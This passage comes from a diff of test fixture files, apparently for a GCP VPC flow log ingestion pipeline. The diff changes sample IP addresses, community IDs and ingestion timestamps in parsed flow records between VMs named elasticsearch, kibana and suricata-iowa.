"{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391588500Z", + "original": "{\"insertId\":\"bnj3cofh3cdkn\",\"jsonPayload\":{\"bytes_sent\":\"170396\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", "end": "2019-06-14T03:49:59.565300944Z", @@ -7874,10 +7874,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33570, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -7891,7 +7891,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:W60ErjE9kT0Dm5xlbB8kttSgelA=", + "community_id": "1:F7T6LmH5wVzEgGnm1LS0ir3ltmg=", "bytes": 171610, "name": "default", "transport": "tcp", @@ -7914,7 +7914,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -7950,8 +7950,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868706500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391592600Z", + "original": "{\"insertId\":\"bnj3cofh3cdk5\",\"jsonPayload\":{\"bytes_sent\":\"171610\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"71\",\"reporter\":\"SRC\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", "end": "2019-06-14T03:49:51.821129119Z", @@ -7972,10 +7972,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33858, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -7989,7 +7989,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DXSnxcLrDyftjOc5jFhwTKkshsM=", + "community_id": "1:FZaxwdeLVaVT2X3mtyj9cQcUk8w=", "bytes": 15186, "name": "default", "transport": "tcp", @@ -8012,7 +8012,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -8048,8 +8048,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868709900Z", - "original": "{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391596300Z", + "original": "{\"insertId\":\"bnj3cofh3cdk6\",\"jsonPayload\":{\"bytes_sent\":\"15186\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933164456Z\",\"packets_sent\":\"75\",\"reporter\":\"SRC\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", "end": "2019-06-14T03:49:37.933164456Z", @@ -8070,10 +8070,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33590, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8087,7 +8087,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LSB085+2dyGfQIXV+wF0qEVVBbM=", + "community_id": "1:hba8zo6o+Om2iBhvTc1A5aHscIQ=", "bytes": 208416, "name": "default", "transport": "tcp", @@ -8110,7 +8110,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -8146,8 +8146,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868713600Z", - "original": "{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391600200Z", + "original": "{\"insertId\":\"y4wffpfk2ero3\",\"jsonPayload\":{\"bytes_sent\":\"208416\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33590,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", "end": "2019-06-14T03:49:59.565116665Z", @@ -8168,10 +8168,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60108, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -8185,7 +8185,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:kjDd+NEFkosMxZFp790k2Cervw4=", + "community_id": "1:snu0k+vlENq/m4IvQF8L2f6rQrY=", "bytes": 90977, "name": "default", "transport": "tcp", @@ -8208,7 +8208,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { @@ -8244,8 +8244,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868717400Z", - "original": "{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391603600Z", + "original": "{\"insertId\":\"y4wffpfk2eroh\",\"jsonPayload\":{\"bytes_sent\":\"90977\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60108,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"357\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", "end": "2019-06-14T03:49:54.108975753Z", @@ -8266,10 +8266,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33536, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8283,7 +8283,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:c/u5Mg/PGR6riBWo0YXGpZWs3cI=", + "community_id": "1:LeOPi08ubqTh6aNT93e8m/GSF+Y=", "bytes": 187301, "name": "default", "transport": "tcp", @@ -8306,7 +8306,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -8342,8 +8342,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868721300Z", - "original": "{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391608Z", + "original": "{\"insertId\":\"y4wffpfk2erom\",\"jsonPayload\":{\"bytes_sent\":\"187301\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33536,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"242\",\"reporter\":\"SRC\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", "end": "2019-06-14T03:49:59.565156020Z", @@ -8370,18 +8370,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 139106, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:daatd5jK/QqBAjEYb64ySmXIcOU=", + "community_id": "1:VbVjklGBQiIYWy94d7CXlQ+ISxo=", "bytes": 139106, "name": "default", "transport": "tcp", @@ -8403,7 +8403,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -8440,8 +8440,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868725100Z", - "original": "{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391613600Z", + "original": "{\"insertId\":\"y4wffpfk2ero9\",\"jsonPayload\":{\"bytes_sent\":\"139106\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -8468,18 +8468,18 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60108, "bytes": 1733360, "domain": "suricata-iowa", - "ip": "192.0.2.177", + "ip": "192.168.2.177", "packets": 708 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:kjDd+NEFkosMxZFp790k2Cervw4=", + "community_id": "1:snu0k+vlENq/m4IvQF8L2f6rQrY=", "bytes": 1733360, "name": "default", "transport": "tcp", @@ -8501,7 +8501,7 @@ }, "related": { "ip": [ - "192.0.2.177", + "192.168.2.177", "10.139.99.242" ] }, @@ -8538,8 +8538,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868728300Z", - "original": "{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391619400Z", + "original": "{\"insertId\":\"y4wffpfk2erog\",\"jsonPayload\":{\"bytes_sent\":\"1733360\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60108},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:54.108975753Z\",\"packets_sent\":\"708\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.762958327Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\